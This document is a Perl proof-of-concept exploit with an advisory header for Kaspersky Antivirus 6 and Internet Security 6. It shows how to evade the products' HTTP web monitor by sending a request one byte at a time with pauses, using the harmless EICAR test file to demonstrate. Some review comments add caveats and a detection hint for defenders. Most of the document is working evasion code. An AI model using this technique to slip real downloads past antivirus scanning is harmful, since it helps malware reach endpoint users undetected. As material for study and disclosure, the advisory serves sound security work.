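# Kaspersky antivirus 6
# Kaspersky internet security 6
# www.kaspersky.com
#
# Vulnerable Systems: KAV6, KIS6
#
# Detail: The vulnerability is caused by HTTP parsing errors in the HTTP
# monitor (Kaspersky Web-antivirus). Any malicious software on the local
# computer can bypass the HTTP virus monitor.
#
# Solution: There is no known solution.
#
# NOTE(review): the advisory speaks only about the HTTP monitor. It does not
# say whether other protection layers (for example on-access file scanning)
# still catch content fetched this way, and it names no fixed build --
# confirm both against current vendor guidance.
#
# Exploit code: This perl script could be run with ActiveState Perl 5.8:
#
# The script requests the EICAR anti-virus test file (a harmless string that
# scanners detect by convention) and prints whatever body comes back, so a
# working web monitor would be expected to block or replace the document.

use strict;
use warnings;
use IO::Socket::INET;

my ( $h_srv, $h_port, $h_url ) = (
    'www.eicar.com',
    'http(80)',
    'http://www.eicar.com/download/eicar.com',
);

syswrite STDOUT, "connecting to $h_srv:$h_port (for $h_url)\n";
my $s = IO::Socket::INET->new(
    PeerAddr => $h_srv,
    PeerPort => $h_port,
    Proto    => 'tcp',
);

# IO::Socket::INET reports constructor failures in $@; $! is only a fallback.
die 'socket: ' . ( $@ || $! ) unless $s;

sendthem( $s, "GET $h_url HTTP/1.1", "Host: $h_srv", "" );
my $doc = read_body( $s, read_headers($s) );
syswrite STDOUT, 'document is <' . $doc . '> len=' . length($doc) . "\n";

# Send each given line to the socket one character at a time, followed by
# CRLF, echoing progress to STDOUT.
#   $sock  - connected socket object
#   @lines - request lines without line terminators ('' ends the header block)
sub sendthem {
    my ( $sock, @lines ) = @_;
    my $count = 0;
    for my $line (@lines) {
        ++$count;
        syswrite STDOUT, "query $count: ";
        sendone( $sock, $_ ) for split //, $line;
        sendone( $sock, "\r" );
        sendone( $sock, "\n" );
    }
    return;
}

# Write a single character to the socket, echo it to STDOUT, then pause.
sub sendone {
    my ( $sock, $char ) = @_;
    defined $sock->syswrite($char) or die "send: $!";
    syswrite STDOUT, $char;

    # !!! comment next line to have monitoring working ;)
    # Per the author's remark above, this 0.3 s pause after every one-byte
    # write is the condition under which the monitor misses the request;
    # without it the product intercepts the download. The advisory gives no
    # more detail than "HTTP parsing errors", so the exact parser fault is
    # not established here. For defenders: a request that arrives one byte
    # per write with long gaps is unusual for ordinary clients.
    select( undef, undef, undef, 0.300 );
    return;
}

# Read response header lines up to and including the blank line that ends
# them, echoing each to STDOUT.
# Returns the Content-Length value, or 0 when no such header was seen.
sub read_headers {
    my ($sock) = @_;
    my ( $count, $content_length ) = ( 0, 0 );
    while (1) {
        my $line = read_line($sock);
        ++$count;
        syswrite STDOUT, "header $count: $line";
        syswrite STDOUT, "\r\n";

        # Compare against the empty string so a line consisting of "0" is
        # not mistaken for the end of the headers.
        last if $line eq '';

        # Header field names are case-insensitive and the whitespace after
        # the colon is optional.
        $content_length = $1 if $line =~ /\AContent-Length:\s*(\d+)/i;
    }
    return $content_length;
}

# Read one line from the socket a byte at a time. Carriage returns are
# dropped and the terminating newline is not included in the result.
# Dies if the read returns nothing (EOF or error) before a newline.
sub read_line {
    my ($sock) = @_;
    my $line = '';
    while (1) {
        my $byte = '';
        my $got  = $sock->sysread( $byte, 1 );
        die 'EOF reading headers!' unless $got;
        last if $byte eq "\n";
        next if $byte eq "\r";
        $line .= $byte;
    }
    return $line;
}

# Read the response body a byte at a time.
#   $cl - Content-Length from read_headers; when non-zero, at most that many
#         bytes are read, otherwise reading continues until the read returns
#         nothing (EOF or error).
# Returns the body as a string.
sub read_body {
    my ( $sock, $cl ) = @_;
    my $body    = '';
    my $bounded = $cl ? 1 : 0;
    syswrite STDOUT, "reading body ...\n";
    while (1) {
        my $byte = '';
        my $got  = $sock->sysread( $byte, 1 );
        last unless $got;
        $body .= $byte;
        last if $bounded and --$cl == 0;
    }
    return $body;
}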